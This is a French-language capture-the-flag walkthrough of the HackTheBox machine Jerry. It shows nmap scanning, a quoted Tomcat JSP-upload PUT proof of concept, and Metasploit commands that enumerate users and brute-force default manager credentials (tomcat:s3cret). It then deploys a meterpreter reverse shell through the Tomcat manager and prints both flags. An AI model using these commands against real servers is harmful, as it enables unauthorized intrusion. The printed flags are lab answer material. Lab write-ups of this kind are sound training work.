HackTheBox Walkthrough - Jerry¶
Machine ciblée : Jerry.
Répertoire : /home/kali/Jerry
Temps passé dessus : 1/2h
Phase 1 : Reconnaissance¶
┌──(kali㉿kali)-[~]
└─$
name="Jerry"
repository="/home/kali/$name"
ip="10.10.10.95"
domain='htb'
cd $repository 2&>/dev/null || mkdir $repository && cd $repository
grep "$ip $name ${name}.${domain}" /etc/hosts >/dev/null || echo "$ip $name ${name}.${domain}" | sudo tee -a /etc/hosts
nmap -Pn -A -T5 --top-port 1000 -oN $repository/txt $ip
nmap -Pn -A -T5 -p - -oN $repository/full $ip
Nmap scan report for Jerry (10.10.10.95)
All 1000 scanned ports on Jerry (10.10.10.95) are in ignored states.
Not shown: 836 filtered tcp ports (no-response), 164 closed tcp ports (conn-refused)
Oh oh. Le premier scan est plutôt intéressant, il ne ressort absolument rien par défaut. Il va peut-être falloir voir pour rajouter d’autres options au nmap ?
nmap -Pn -A -T5 -p - -oN $repository/full $ip
Nmap scan report for Jerry (10.10.10.95)
Host is up (0.018s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
Ah bah non, je suis presque triste … Bon, c’est une easy donc tant mieux. D’ailleurs, on note le trait d’humour entre Jerry et TomCat !
Phase 2 : Analyse¶
──(kali㉿kali)-[~/Jerry]
└─$ searchsploit Apache Tomcat 7.0.88
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1) | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2) | jsp/webapps/42966.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Jerry]
└─$ cat windows/webapps/42953.txt
cat: windows/webapps/42953.txt: No such file or directory
┌──(kali㉿kali)-[~/Jerry]
└─$ cat /usr/share/exploitdb/exploits/windows/webapps/42953.txt
# E-DB Note: https://www.alphabot.com/security/blog/2017/java/Apache-Tomcat-RCE-CVE-2017-12617.html
When running on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request.
This JSP could then be requested and any code it contained would be executed by the server.
The PoC is like this:
PUT /1.jsp/ HTTP/1.1
Host: 192.168.3.103:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.103:8080/examples/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
Connection: close
Content-Length: 26
<% out.println("hello");%>
It is the bypass for CVE-2017-12615
Intéressant, mais pas sûr que ça m’aide. Toutefois, on comprends qu’il y a une CVE dessus, et que si l’on peut pousser des fichiers, on pourra exécuter du code. Allons voir un peu le site.
On voit ici une interface manager dont on a pas les creds. Bon, en vrai, j’ai tenté admin:admin, ça a marché et j’ai pleuré. Mais comme ça donne pas tous les droits et qu’il faut fouiller plus encore, on va le faire comme si on n’y avait pas pensé :
┌──(kali㉿kali)-[~/Jerry]
└─$ msfconsole -q -x "use auxiliary/scanner/http/tomcat_enum;set RHOSTS $name.$domain;set TARGETURI /manager/;run; exit"
[+] http://10.10.10.95:8080/manager/ - Users found: ADMIN, QCC, admin, both, cxsdk, j2deployer, manager, ovwebusr, role, role1, root, tomcat, xampp
┌──(kali㉿kali)-[~/Jerry]
└─$ msfconsole -q -x "use auxiliary/scanner/http/tomcat_mgr_login;set RHOSTS $name.$domain;set verbose false; run; exit"
[+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret
┌──(kali㉿kali)-[~/Jerry]
└─$ localip=`ip a | grep tun0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
┌──(kali㉿kali)-[~/Jerry]
└─$ msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass;set RHOSTS $name.$domain;set LHOST $localip;run;exit"
[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Uploading payload...
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
[*] Exploit completed, but no session was created.
Dommage, ca vallait le coup d’essayer. En regardant la page de managment, on se rends compte qu’on peut upload des .war. Qui dit upload légitime dit souvent faille … On cherche sur google et on tombe là dessus.
Phase 3 : User¶
msf6 exploit(multi/http/tomcat_jsp_upload_bypass) > search tomcat
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
6 exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution
7 exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution
9 auxiliary/scanner/http/tomcat_enum normal No Apache Tomcat User Enumeration
17 post/multi/gather/tomcat_gather normal No Gather Tomcat Credentials
24 auxiliary/admin/http/tomcat_administration normal No Tomcat Administration Tool Default Access
25 auxiliary/scanner/http/tomcat_mgr_login normal No Tomcat Application Manager Login Utility
26 exploit/multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass
27 auxiliary/admin/http/tomcat_utf8_traversal 2009-01-09 normal No Tomcat UTF-8 Directory Traversal Vulnerability
28 auxiliary/admin/http/trendmicro_dlp_traversal 2009-01-09 normal No TrendMicro Data Loss Prevention 5.5 Directory Traversal
29 post/windows/gather/enum_tomcat normal No Windows Gather Apache Tomcat Enumeration
msf6 exploit(multi/http/tomcat_jsp_upload_bypass) > use exploit/multi/http/tomcat_mgr_upload
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > show options
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS jerry.htb
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST 10.10.14.6
msf6 exploit(multi/http/tomcat_mgr_upload) > run
[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Retrieving session ID and CSRF token...
[-] Exploit aborted due to failure: unknown: Unable to access the Tomcat Manager
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
msf6 exploit(multi/http/tomcat_mgr_upload) > run
meterpreter >
Et bien on a pu poser une charge grace a l’interface de managment. Tentons de trouver les flags :
meterpreter > cd C:\\Users
meterpreter > ls
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040776/rwxrwxrw- 8192 dir 2018-06-18 16:31:28 -0400 Administrator
040777/rwxrwxrwx 4096 dir 2022-01-21 13:53:08 -0500 All Users
040777/rwxrwxrwx 8192 dir 2013-08-22 12:08:06 -0400 Default
040777/rwxrwxrwx 8192 dir 2013-08-22 12:08:06 -0400 Default User
040776/rwxrwxrw- 4096 dir 2013-08-22 11:39:32 -0400 Public
100777/rwxrwxrwx 174 fil 2013-08-22 11:37:57 -0400 desktop.ini
[...]
meterpreter > ls
Listing: C:\Users\Administrator\Desktop\flags
=============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100776/rwxrwxrw- 88 fil 2018-06-19 00:11:36 -0400 2 for the price of 1.txt
meterpreter > cat 2\ for\ the\ price\ of\ 1.txt
user.txt
7004dbcef0f854e0fb401875f26ebd00
root.txt
04a8b36e1545a455393d067e772fe90e
Phase 4 : Elevation de privilege¶
/ Il n’y a pas de PE dans celle-ci.
Récapitulatif¶
Ok, je l’ai trouvé un peu plus dur que Lame, mais toujours très « simple », ça fait du bien de trouver du niveau easy. L’absence de PE se fait un peu manqué, on arrive vite à la fin. Comme dit précédemment, toujours regarder tous les outils qui sont à notre porté, bien que j’avais le compte admin, j’ai du fouiller plus pour trouver le tomcat, qui m’aura bien servi.
A retenir¶
Faut-il répéter de mettre à jour ses machines ? Bien dans ce cas, ajoutons « ne pas utiliser de mot de passe trivial/par défaut/compromis ». Je commence de mieux en mieux à gérer msfconsole.